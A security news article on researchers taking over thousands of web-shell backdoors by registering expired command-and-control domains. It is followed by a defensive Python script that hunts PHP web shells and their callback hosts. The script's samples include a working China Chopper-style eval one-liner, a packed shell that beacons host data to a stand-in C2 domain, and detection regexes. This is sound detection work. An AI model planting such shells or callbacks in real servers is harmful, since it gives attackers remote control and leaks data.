Thousands of Live Backdoors Exposed as Hackers’ Command Domains Expire

Web Shell Backdoor Takeover Exposes Thousands of Compromised Systems

Security researchers at WatchTowr Labs, in collaboration with The Shadowserver Foundation, have successfully intercepted over 4,000 active web backdoors by acquiring expired command-and-control domains. This operation revealed numerous compromised high-profile systems, including government and educational institutions.

The investigation uncovered various types of web shells, including:
– r57shell (basic backdoor)
– c99shell (advanced capabilities with file management)
– China Chopper (associated with APT groups)

Notable compromised systems included:
– Chinese government infrastructure and courts
– Nigerian government judicial system
– Bangladesh government network
– Educational institutions in Thailand, China, and South Korea

The research team identified these compromised systems by registering over 40 expired domains previously used to control the backdoors. Once the domains were theirs, they set up logging that captured the connection attempts of compromised servers trying to "phone home."

To prevent malicious actors from exploiting these backdoors, The Shadowserver Foundation has assumed control of the domains and established a sinkhole for all traffic from affected systems. This intervention has effectively prevented potential cybercriminals from gaining unauthorized access to these compromised systems.

The findings highlight a significant security risk: expired malware control domains can be easily acquired by threat actors, potentially giving them immediate access to previously compromised systems that remain unpatched.
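The defender's side of this finding is that a server may still be running a web shell that beacons to a domain nobody legitimately controls anymore. The script below is an added example (not tooling from WatchTowr Labs or The Shadowserver Foundation) that triages PHP files under a web root for common shell indicators, pulls out the hostnames they phone home to (clear text or base64-encoded), and cross-checks those hosts against an egress proxy log. The sample files, the indicator patterns, and the log format (`timestamp client method url status`) are all constructed assumptions for this example.

```python
"""Hunt for web shells on a server you defend and list where they phone home.

Added example, not tooling from WatchTowr Labs or The Shadowserver Foundation.
Assumptions (constructed for this example): PHP web shells under a readable web
root, callback URLs either in clear text or base64-encoded, and an egress proxy
log in a simple "timestamp client method url status" format.
"""
import base64
import re
import tempfile
from pathlib import Path

# Source-level indicators seen in common PHP web shells (constructed list, not exhaustive).
SHELL_INDICATORS = {
    # China Chopper-style one-liner: the code to run arrives in a request parameter
    "eval_of_request": re.compile(r"\beval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b"),
    # packed second stage: eval(gzinflate(base64_decode(...)))
    "eval_packed": re.compile(r"\beval\s*\(\s*(?:gzinflate|gzuncompress|str_rot13)?\s*\(?\s*base64_decode\s*\("),
    # literal remote fetch at include time
    "remote_fetch": re.compile(r"\b(?:file_get_contents|curl_init|fsockopen)\s*\(\s*['\"]https?://"),
}
URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+\.[A-Za-z]{2,})")
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def extract_hosts(source: str) -> set[str]:
    """Hostnames in clear-text URLs plus those hidden inside base64 blobs."""
    hosts = set(URL_HOST.findall(source))
    for blob in B64_BLOB.findall(source):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
        except ValueError:  # binascii.Error is a ValueError: bad padding or alphabet
            continue
        hosts.update(URL_HOST.findall(decoded))
    return hosts


def triage_source(source: str) -> dict:
    """Indicators hit, hosts referenced, and whether the file deserves a closer look."""
    indicators = sorted(name for name, rx in SHELL_INDICATORS.items() if rx.search(source))
    return {"indicators": indicators, "hosts": sorted(extract_hosts(source)),
            "suspicious": bool(indicators)}


def triage_tree(root: Path) -> dict[str, dict]:
    """Triage every .php file under root, keyed by path relative to root."""
    return {p.relative_to(root).as_posix(): triage_source(p.read_text(errors="ignore"))
            for p in sorted(root.rglob("*.php"))}


def outbound_beacons(log_lines, hosts_of_interest: set[str]) -> list[tuple[str, str, str]]:
    """(timestamp, client, host) for egress-log lines that reach a callback host."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 4:
            continue
        m = URL_HOST.match(parts[3])
        if m and m.group(1) in hosts_of_interest:
            hits.append((parts[0], parts[1], m.group(1)))
    return hits


# Constructed samples: one Chopper-style one-liner, one packed shell with an encoded
# callback URL, and one benign file that merely mentions a hostname in a comment.
B64_CALLBACK = base64.b64encode(b"http://c2-panel.example.invalid/gate.php").decode()
B64_STUB = base64.b64encode(b"/* constructed second stage */").decode()
SAMPLES = {
    "uploads/cache.php": "<?php @eval($_POST['cmd']); ?>\n",
    "images/thumb.php": (
        "<?php\n$u = base64_decode('" + B64_CALLBACK + "');\n"
        "@file_get_contents($u . '?h=' . $_SERVER['HTTP_HOST']);\n"
        "eval(gzinflate(base64_decode('" + B64_STUB + "')));\n"
    ),
    "index.php": "<?php\n// docs: https://www.example.com/help\ninclude 'config.php';\n",
}
EGRESS_LOG = [  # constructed proxy log lines
    "2025-01-08T10:00:01Z 10.0.3.7 GET http://c2-panel.example.invalid/gate.php?h=www1 200",
    "2025-01-08T10:00:02Z 10.0.3.7 GET https://www.example.com/help 200",
    "2025-01-08T10:05:01Z 10.0.3.9 GET http://c2-panel.example.invalid/gate.php?h=www2 404",
]


def run_demo() -> dict:
    """Write the samples to a temporary web root, triage them, and match the egress log."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for rel, src in SAMPLES.items():
            path = root / rel
            path.parent.mkdir(parents=True, exist_ok=True)
            path.write_text(src)
        results = triage_tree(root)
    # Only hosts referenced by files that also hit a shell indicator count as callbacks.
    callback_hosts = {h for r in results.values() if r["suspicious"] for h in r["hosts"]}
    return {"files": results, "callback_hosts": callback_hosts,
            "beacons": outbound_beacons(EGRESS_LOG, callback_hosts)}


if __name__ == "__main__":
    demo = run_demo()
    for rel, r in demo["files"].items():
        print(f"{rel}: suspicious={r['suspicious']} indicators={r['indicators']} hosts={r['hosts']}")
    for ts, client, host in demo["beacons"]:
        print(f"beacon {ts} {client} -> {host}")
```

A hostname on its own is not an indicator (the benign `index.php` references one in a comment), so the script only treats hosts from files that also match a shell pattern as callback targets. Each such host is worth a WHOIS and DNS check: an expired or newly re-registered registration is exactly the condition the research above exploited, and the beacons in the egress log tell you which internal hosts are still trying to reach it.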